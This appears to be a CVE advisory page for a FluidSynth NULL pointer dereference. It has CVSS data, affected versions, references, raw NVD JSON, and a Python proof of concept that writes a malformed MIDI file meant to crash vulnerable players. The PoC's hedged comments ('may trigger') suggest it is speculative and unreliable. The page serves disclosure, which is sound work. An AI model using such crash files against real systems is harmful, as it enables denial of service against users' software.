Security Vulnerability Report
CVE-2025-56225 CVSS 7.5 HIGH

CVE-2025-56225

Published: 2026-01-09 16:16:07
Last Modified: 2026-01-23 02:13:04

Description

FluidSynth 2.4.6 and earlier versions are vulnerable to a NULL pointer dereference in fluid_synth_monopoly.c, which can be triggered when loading an invalid MIDI file.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:fluidsynth:fluidsynth:*:*:*:*:*:*:*:* - VULNERABLE
FluidSynth <= 2.4.6
FluidSynth <= 2.4.5
FluidSynth <= 2.4.4
FluidSynth <= 2.4.3
FluidSynth <= 2.4.2
FluidSynth <= 2.4.1
FluidSynth <= 2.4.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2025-56225 PoC - FluidSynth Null Pointer Dereference

This PoC generates a malformed MIDI file that triggers null pointer
dereference in fluid_synth_monopoly.c when loaded by vulnerable
FluidSynth versions.
"""

import struct


def create_malformed_midi():
    """
    Generate a malformed MIDI file to trigger CVE-2025-56225
    """
    # MIDI Header
    midi_header = b'MThd'
    midi_header += struct.pack('>I', 6)    # Header length
    midi_header += struct.pack('>H', 0)    # Format type 0
    midi_header += struct.pack('>H', 1)    # Number of tracks
    midi_header += struct.pack('>H', 480)  # Ticks per quarter note

    # Malformed Track chunk
    track_data = b''

    # Add SysEx event that may trigger monopoly handling
    # This malformed data can cause null pointer in fluid_synth_monopoly
    track_data += struct.pack('>B', 0xF0)  # SysEx start
    track_data += struct.pack('>B', 0x00)  # Malformed length byte

    # Add Control Change with invalid monopoly-related controller
    track_data += struct.pack('>B', 0xB0)  # Control Change
    track_data += struct.pack('>B', 0x7A)  # Local Control (monopoly related)
    track_data += struct.pack('>B', 0x7F)  # Invalid value

    # Add malformed data to trigger null dereference
    track_data += struct.pack('>B', 0x00)  # Null-like byte
    track_data += struct.pack('>B', 0x00)  # Null-like byte

    # End of track
    track_data += struct.pack('>B', 0xFF)  # Meta event
    track_data += struct.pack('>B', 0x2F)  # End of track
    track_data += struct.pack('>B', 0x00)  # Length 0

    # Wrap in MTrk chunk
    track_chunk = b'MTrk'
    track_chunk += struct.pack('>I', len(track_data))
    track_chunk += track_data

    return midi_header + track_chunk


if __name__ == '__main__':
    midi_data = create_malformed_midi()
    with open('CVE-2025-56225.mid', 'wb') as f:
        f.write(midi_data)
    print('[+] Generated malicious MIDI file: CVE-2025-56225.mid')
    print('[+] This file can trigger null pointer dereference in FluidSynth <= 2.4.6')
```

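References

https://github.com/FluidSynth/fluidsynth/issues/1602 (Exploit, Issue Tracking)
https://github.com/FluidSynth/fluidsynth/pull/1607 (Issue Tracking)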

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-56225", "sourceIdentifier": "[email protected]", "published": "2026-01-09T16:16:06.910", "lastModified": "2026-01-23T02:13:04.377", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "fluidsynth-2.4.6 and earlier versions is vulnerable to Null pointer dereference in fluid_synth_monopoly.c, that can be triggered when loading an invalid midi file."}, {"lang": "es", "value": "fluidsynth-2.4.6 y versiones anteriores es vulnerable a una desreferenciación de puntero nulo en fluid_synth_monopoly.c, que puede activarse al cargar un archivo midi no válido."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fluidsynth:fluidsynth:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.4.6", "matchCriteriaId": "F4FA607B-A19E-4BCD-A06F-044C7E6F43FB"}]}]}], "references": [{"url": "https://github.com/FluidSynth/fluidsynth/issues/1602", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://github.com/FluidSynth/fluidsynth/pull/1607", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/FluidSynth/fluidsynth/issues/1602", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking"]}]}}